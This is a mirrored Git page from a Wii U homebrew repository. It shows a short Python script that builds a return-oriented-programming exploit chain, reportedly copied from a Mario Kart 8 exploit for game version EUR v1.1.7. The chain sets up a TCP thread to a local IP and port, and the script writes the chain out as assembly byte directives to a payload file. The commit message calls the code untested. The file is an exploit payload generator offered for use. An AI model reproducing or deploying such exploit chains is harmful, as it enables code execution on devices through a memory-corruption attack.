mirror of
https://github.com/wiiu-env/ROBChain.git
synced 2024-12-12 11:44:22 +01:00
dcf3bf5204
Untested, copy pasted from the mario kart 8 exploit (rop gadgets address are meant to be used on EUR v1.1.7)
10 lines
312 B
Python
10 lines
312 B
Python
from tcp_ropchain import *
|
|
import struct
|
|
|
|
rop_chain = tcp_thread_ropchain(0x4D070000 + 0x14, [192,168,178,89], 12345)
|
|
|
|
with open('payload.s', 'w') as f:
|
|
for val in rop_chain:
|
|
bytes = [hex(val >> i & 0xff) for i in (24,16,8,0)]
|
|
for v in bytes:
|
|
print('byte %s' % v, file=f) |